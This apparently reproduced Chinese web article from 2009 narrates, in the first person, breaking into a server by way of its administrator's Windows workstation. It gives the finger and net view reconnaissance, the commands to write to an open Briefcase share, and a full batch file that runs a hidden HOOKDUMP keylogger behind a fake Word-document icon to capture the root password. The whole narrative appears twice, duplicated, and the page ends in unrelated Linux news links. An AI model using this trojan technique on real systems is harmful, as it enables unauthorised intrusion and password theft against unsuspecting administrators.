黑客怎樣入侵Linux系統(tǒng)
發(fā)布時(shí)間:2009-06-29 02:09:21 作者:佚名
我要評(píng)論

我發(fā)現(xiàn)了一個(gè)網(wǎng)站,于是常規(guī)入侵。很好,它的FINGER開(kāi)著,于是我編了一個(gè)SHELL,aaa帳號(hào)試到zzz(by the way,這是我發(fā)現(xiàn)的一個(gè)網(wǎng)上規(guī)律,那就是帳號(hào)的長(zhǎng)度與口令的強(qiáng)度成正比,如果一個(gè)帳號(hào)只有兩三位長(zhǎng),那它的口令一般也很簡(jiǎn)單,反之亦然,故且稱之為若氏定理吧),結(jié)果一個(gè)
我發(fā)現(xiàn)了一個(gè)網(wǎng)站,于是常規(guī)入侵。很好,它的FINGER開(kāi)著,于是我編了一個(gè)SHELL,aaa帳號(hào)試到zzz(by the way,這是我發(fā)現(xiàn)的一個(gè)網(wǎng)上規(guī)律,那就是帳號(hào)的長(zhǎng)度與口令的強(qiáng)度成正比,如果一個(gè)帳號(hào)只有兩三位長(zhǎng),那它的口令一般也很簡(jiǎn)單,反之亦然,故且稱之為若氏定理吧),結(jié)果一個(gè)帳號(hào)也不存在,我沒(méi)有再試它的帳號(hào)。因?yàn)槲冶凰_(kāi)的端口吸引住了,它開(kāi)著WWW,我就不信它不出錯(cuò)。一連拿了五種CGI和WWW掃描器總計(jì)掃了三四百種常見(jiàn)錯(cuò)誤它幾乎都不存在還是看看root的信息吧:
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
root經(jīng)常來(lái),那個(gè)202.xx.xx.xx就是他用的工作站了,從那會(huì)不會(huì)看到點(diǎn)東西呢?
net view \202.xx.xx.xx
Shared resources at \202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包
The command was completed successfully.
在上網(wǎng)的機(jī)器上開(kāi)著WINDOWS的“文件和打印機(jī)共享”的服務(wù),是很多人容易掉以輕心的,這個(gè)root沒(méi)有例外。如果它的C盤(pán)共享了而且可寫(xiě)那就好了,但那是做夢(mèng),現(xiàn)在開(kāi)了共享的目錄沒(méi)有一個(gè)是根目錄,連D驅(qū)的都沒(méi)有。別著急,慢慢來(lái)。x掉的那些文件夾都沒(méi)用,不能寫(xiě),里面盡是些英文原著,這個(gè)root還挺行的。“我的公文包”吸引了我的注意,這是一個(gè)用于將不同的機(jī)器上的資料進(jìn)行同步的工具,很顯然這個(gè)root要經(jīng)常更新主機(jī)上的主頁(yè),有時(shí)候在自己的機(jī)器上編,有時(shí)候在主機(jī)上編……所以很重要的一點(diǎn):“我的公文包”的共享一般都是可寫(xiě)的!
那我再進(jìn)去看看。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不錯(cuò),確實(shí)可寫(xiě)。
>del temp.txt
不留痕跡——黑客的習(xí)慣。
>dir/od/p
看看都有些什么…… 倒數(shù)第二排那個(gè)是什么?“X月工作計(jì)劃.doc”!就是它了,既然是計(jì)劃就不可能寫(xiě)完了就丟一邊,它肯定會(huì)再次打開(kāi)它的——至少下個(gè)月寫(xiě)計(jì)劃時(shí)要COPY一下:->
page
該動(dòng)手了,我的目標(biāo)就是讓它下次打開(kāi)時(shí)誤中我的陷阱而運(yùn)行我藏的木馬。我這次用的是一個(gè)鍵盤(pán)計(jì)錄軟件HOOKDUMP,我覺(jué)得它挺好的,價(jià)錢實(shí)惠,量也足…… 對(duì)不起,說(shuō)習(xí)慣了,應(yīng)該是它不僅記錄下全部擊鍵,還記錄下打開(kāi)或關(guān)掉了什么程序、按過(guò)什么按紐、用過(guò)什么菜單…… 總之,它的記錄讓你就和你站在他身后看他操作計(jì)算機(jī)一樣詳細(xì)了。您要問(wèn)那么多木馬你為啥裝這個(gè)?要知道無(wú)論是中國(guó)的冰河、netspy還是外國(guó)的netbus、BO,都被各種殺毒軟件列為頭號(hào)偵查對(duì)象,而一個(gè)root的機(jī)器上可不可能沒(méi)裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過(guò)如果大家都用只怕我再用它的機(jī)會(huì)就少了……
>copy hookdump.* i:
補(bǔ)充一點(diǎn):上傳前先編好它的hookdump.ini文件,置為隱藏方式運(yùn)行,不然root一運(yùn)行屏幕上蹦出一大窗口可就……。
然后再在自己的機(jī)器上編一個(gè)同名的BAT文件:X月工作計(jì)劃.BAT
>edit c:X月工作計(jì)劃.BAT
@echo off
hookdump
attrib -h X月工作計(jì)劃.doc
C:Program FilesMicrosoftOfficeWinword X月工作計(jì)劃.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root運(yùn)行了這個(gè)BAT文件實(shí)際上就是先運(yùn)行木馬,再調(diào)用WINWORD文件打開(kāi)它想開(kāi)的這個(gè)文件,然后自我刪除,也許它機(jī)器上WINWORD的位置不同,那調(diào)用就會(huì)失敗,不過(guò)不要緊,反正BAT會(huì)馬上刪除,他會(huì)以為是自己的誤操作。
這時(shí)你的C驅(qū)根目錄就有了這么一個(gè)BAT文件,它是一個(gè)方形的圖標(biāo),和那個(gè)WORD文件大相徑庭,root怎么會(huì)運(yùn)行它呢?沒(méi)關(guān)系,在這個(gè)文件上點(diǎn)右鍵,點(diǎn)屬性,在“程序”欄選“更改圖標(biāo)”不就行了嗎?WORD的圖標(biāo)在你機(jī)器C:Program FilesMicrosoftOffice中。還要將“運(yùn)行”改為“最小化”,“退出時(shí)關(guān)閉”打上勾,這樣才能保證在運(yùn)行時(shí)一點(diǎn)跡象也沒(méi)有。事實(shí)上這個(gè) BAT文件變成了兩個(gè),還有一個(gè)PIF文件就是它的圖標(biāo)。
把這兩個(gè)文件傳上去:
>copy X月工作計(jì)劃.bat i:
>copy X月工作計(jì)劃.pif i:
然后把它的文件和自己的文件都藏起來(lái):
>attrib +h X月工作計(jì)劃.doc
>attrib +h X月工作計(jì)劃.bat
這樣,root的“公文包”里只剩下一個(gè)和原來(lái)一模一樣的WORD圖標(biāo),他做夢(mèng)也沒(méi)想到這已變成了一個(gè)BAT文件。然后可以喘口氣了,讓我們靜靜的等……
幾天后,我進(jìn)入這個(gè)工作站,取下記錄下來(lái)的擊鍵記錄,找出root的口令,進(jìn)入主機(jī)。
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
root經(jīng)常來(lái),那個(gè)202.xx.xx.xx就是他用的工作站了,從那會(huì)不會(huì)看到點(diǎn)東西呢?
net view \202.xx.xx.xx
Shared resources at \202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包
The command was completed successfully.
在上網(wǎng)的機(jī)器上開(kāi)著WINDOWS的“文件和打印機(jī)共享”的服務(wù),是很多人容易掉以輕心的,這個(gè)root沒(méi)有例外。如果它的C盤(pán)共享了而且可寫(xiě)那就好了,但那是做夢(mèng),現(xiàn)在開(kāi)了共享的目錄沒(méi)有一個(gè)是根目錄,連D驅(qū)的都沒(méi)有。別著急,慢慢來(lái)。x掉的那些文件夾都沒(méi)用,不能寫(xiě),里面盡是些英文原著,這個(gè)root還挺行的。“我的公文包”吸引了我的注意,這是一個(gè)用于將不同的機(jī)器上的資料進(jìn)行同步的工具,很顯然這個(gè)root要經(jīng)常更新主機(jī)上的主頁(yè),有時(shí)候在自己的機(jī)器上編,有時(shí)候在主機(jī)上編……所以很重要的一點(diǎn):“我的公文包”的共享一般都是可寫(xiě)的!
那我再進(jìn)去看看。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不錯(cuò),確實(shí)可寫(xiě)。
>del temp.txt
不留痕跡——黑客的習(xí)慣。
>dir/od/p
看看都有些什么…… 倒數(shù)第二排那個(gè)是什么?“X月工作計(jì)劃.doc”!就是它了,既然是計(jì)劃就不可能寫(xiě)完了就丟一邊,它肯定會(huì)再次打開(kāi)它的——至少下個(gè)月寫(xiě)計(jì)劃時(shí)要COPY一下:->
page
該動(dòng)手了,我的目標(biāo)就是讓它下次打開(kāi)時(shí)誤中我的陷阱而運(yùn)行我藏的木馬。我這次用的是一個(gè)鍵盤(pán)計(jì)錄軟件HOOKDUMP,我覺(jué)得它挺好的,價(jià)錢實(shí)惠,量也足…… 對(duì)不起,說(shuō)習(xí)慣了,應(yīng)該是它不僅記錄下全部擊鍵,還記錄下打開(kāi)或關(guān)掉了什么程序、按過(guò)什么按紐、用過(guò)什么菜單…… 總之,它的記錄讓你就和你站在他身后看他操作計(jì)算機(jī)一樣詳細(xì)了。您要問(wèn)那么多木馬你為啥裝這個(gè)?要知道無(wú)論是中國(guó)的冰河、netspy還是外國(guó)的netbus、BO,都被各種殺毒軟件列為頭號(hào)偵查對(duì)象,而一個(gè)root的機(jī)器上可不可能沒(méi)裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過(guò)如果大家都用只怕我再用它的機(jī)會(huì)就少了……
>copy hookdump.* i:
補(bǔ)充一點(diǎn):上傳前先編好它的hookdump.ini文件,置為隱藏方式運(yùn)行,不然root一運(yùn)行屏幕上蹦出一大窗口可就……。
然后再在自己的機(jī)器上編一個(gè)同名的BAT文件:X月工作計(jì)劃.BAT
>edit c:X月工作計(jì)劃.BAT
@echo off
hookdump
attrib -h X月工作計(jì)劃.doc
C:Program FilesMicrosoftOfficeWinword X月工作計(jì)劃.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root運(yùn)行了這個(gè)BAT文件實(shí)際上就是先運(yùn)行木馬,再調(diào)用WINWORD文件打開(kāi)它想開(kāi)的這個(gè)文件,然后自我刪除,也許它機(jī)器上WINWORD的位置不同,那調(diào)用就會(huì)失敗,不過(guò)不要緊,反正BAT會(huì)馬上刪除,他會(huì)以為是自己的誤操作。
這時(shí)你的C驅(qū)根目錄就有了這么一個(gè)BAT文件,它是一個(gè)方形的圖標(biāo),和那個(gè)WORD文件大相徑庭,root怎么會(huì)運(yùn)行它呢?沒(méi)關(guān)系,在這個(gè)文件上點(diǎn)右鍵,點(diǎn)屬性,在“程序”欄選“更改圖標(biāo)”不就行了嗎?WORD的圖標(biāo)在你機(jī)器C:Program FilesMicrosoftOffice中。還要將“運(yùn)行”改為“最小化”,“退出時(shí)關(guān)閉”打上勾,這樣才能保證在運(yùn)行時(shí)一點(diǎn)跡象也沒(méi)有。事實(shí)上這個(gè) BAT文件變成了兩個(gè),還有一個(gè)PIF文件就是它的圖標(biāo)。
把這兩個(gè)文件傳上去:
>copy X月工作計(jì)劃.bat i:
>copy X月工作計(jì)劃.pif i:
然后把它的文件和自己的文件都藏起來(lái):
>attrib +h X月工作計(jì)劃.doc
>attrib +h X月工作計(jì)劃.bat
這樣,root的“公文包”里只剩下一個(gè)和原來(lái)一模一樣的WORD圖標(biāo),他做夢(mèng)也沒(méi)想到這已變成了一個(gè)BAT文件。然后可以喘口氣了,讓我們靜靜的等……
幾天后,我進(jìn)入這個(gè)工作站,取下記錄下來(lái)的擊鍵記錄,找出root的口令,進(jìn)入主機(jī)。
相關(guān)文章
Fedora Linux 42 穩(wěn)定版發(fā)布: 帶來(lái)大量新功能和軟件更新
Fedora 42昨日發(fā)布,這是 Red Hat 贊助開(kāi)發(fā)的杰出前沿 Linux 發(fā)行版的最新版,包含大量新功能和軟件更新,使其成為 2025 年上半年發(fā)布的一款出色的 Linux 操作系統(tǒng)之一,內(nèi)2025-04-16如何在Linux查看硬盤(pán)信息? 查看Linux硬盤(pán)大小類型和硬件信息的5種方法
使用Linux系統(tǒng)的過(guò)程中,查看和了解硬盤(pán)信息是非常重要的工作,尤其是對(duì)于系統(tǒng)管理員而言,那么在Linux系統(tǒng)中如何查看硬盤(pán)信息?以下是具體內(nèi)容介紹2025-03-12如何在 Linux 中查看 CPU 詳細(xì)信息? 3招輕松查看CPU型號(hào)、核心數(shù)和溫度
在日常運(yùn)維工作中,獲取 CPU 信息是系統(tǒng)運(yùn)維管理員常見(jiàn)的工作內(nèi)容,無(wú)論是為了性能調(diào)優(yōu)、硬件升級(jí)還是僅僅滿足好奇心2025-03-11什么是 Arch Linux? 獨(dú)樹(shù)一幟的Arch Linux發(fā)行版分析
Arch Linux是為簡(jiǎn)化,優(yōu)化,現(xiàn)代化,實(shí)用主義,用戶中心和多功能性而創(chuàng)建Linux發(fā)行版,究竟是什么讓 Arch 與眾不同?下面我們就來(lái)簡(jiǎn)要解讀2025-02-19如何在Linux環(huán)境下制作 Win11裝機(jī)U盤(pán)?
一直用的linux辦公,想要將筆記本電腦從 Linux 系統(tǒng)切換回 Windows 11,我們可以制作一個(gè)win11裝機(jī)u盤(pán),詳細(xì)如下2025-02-17Rsnapshot怎么用? 基于Rsync的強(qiáng)大Linux備份工具使用指南
Rsnapshot 不僅可以備份本地文件,還能通過(guò) SSH 備份遠(yuǎn)程文件,接下來(lái)詳細(xì)介紹如何安裝、配置和使用 Rsnapshot,包括創(chuàng)建每小時(shí)、每天、每周和每月的本地備份,以及如何進(jìn)2025-02-06Linux Kernel 6.13發(fā)布:附更新內(nèi)容及新特性解讀
Linux 內(nèi)核 6.13 正式發(fā)布,新版本引入了惰性搶占支持,簡(jiǎn)化內(nèi)核搶占邏輯,通過(guò)減少與調(diào)度器相關(guān)的調(diào)用次數(shù),讓內(nèi)核在運(yùn)行時(shí)表現(xiàn)更優(yōu),從而提高效率2025-01-23五大特性引領(lǐng)創(chuàng)新! 深度操作系統(tǒng) deepin 25 Preview預(yù)覽版發(fā)布
今日,深度操作系統(tǒng)正式推出deepin 25 Preview版本,該版本集成了五大核心特性:磐石系統(tǒng)、全新DDE、Treeland窗口合成器、AI For OS以及Distrobox子系統(tǒng)2025-01-18Linux Mint Xia 22.1重磅發(fā)布: 重要更新一覽
Beta 版 Linux Mint“Xia” 22.1 發(fā)布,新版本基于 Ubuntu 24.04,內(nèi)核版本為 Linux 6.8,這次更新帶來(lái)了諸多優(yōu)化和改進(jìn),進(jìn)一步鞏固了 Mint 在 Linux 桌面操作系統(tǒng)領(lǐng)域的2025-01-16LinuxMint怎么安裝? Linux Mint22下載安裝圖文教程
Linux Mint22發(fā)布以后,有很多新功能,很多朋友想要下載并安裝,該怎么操作呢?下面我們就來(lái)看看詳細(xì)安裝指南2025-01-16